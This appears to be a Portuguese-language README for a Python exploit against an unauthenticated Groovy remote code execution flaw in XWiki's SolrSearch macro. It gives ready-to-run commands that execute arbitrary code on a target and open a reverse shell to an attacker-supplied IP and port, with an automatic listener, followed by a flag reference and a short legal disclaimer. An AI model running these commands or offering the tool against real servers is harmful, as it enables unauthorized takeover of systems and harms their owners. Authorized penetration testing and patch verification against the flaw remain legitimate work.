
Exploit de RCE não autenticado do XWiki para Shell Reverso
Exploit de RCE não autenticado no XWiki
As versões afetadas do XWiki contêm uma vulnerabilidade de Execução Remota de Código causada pelo tratamento inseguro de expressões Groovy na macro SolrSearch. Atacantes não autenticados podem executar código Groovy arbitrário remotamente e obter um shell reverso.
Este exploit pode ser usado para executar código na máquina alvo e também pode estabelecer um shell reverso. Dois modos estão disponíveis: interativo ou baseado em parâmetros. O exploit pode iniciar automaticamente um listener ou usar um existente.

python3 xwiki_groovy_rce.py
# Remote Code Execution
python3 xwiki_groovy_rce.py --code "mkdir test" -u http://example.com
# Reverse Shell with automatic listener (default)
python3 xwiki_groovy_rce.py --reverse-shell -u http://example.com -i YOUR_IP -p 4480
# Reverse Shell without existing listener (no automatic listener)
python3 xwiki_groovy_rce.py --reverse-shell -u http://example.com -i YOUR_IP -p 4480 --no-listener
-h/--help: Mostrar o menu de ajuda
-u/--url: URL alvo do XWiki (obrigatório)
-r/--reverse-shell: Executar um shell reverso
-c/--command: Executar um único comando
-i/--ip: Especificar IP do listener (apenas para shell reverso)
-p/--port: Especificar porta do listener (apenas para shell reverso, padrão=4444)
--no-listener: Não iniciar um listener (apenas para shell reverso)
Esta prova de conceito é apenas para fins educacionais e de teste autorizado.
O uso não autorizado contra sistemas que você não possui ou não tem permissão explícita para testar é ilegal.
Os autores não são responsáveis por qualquer uso indevido desta informação.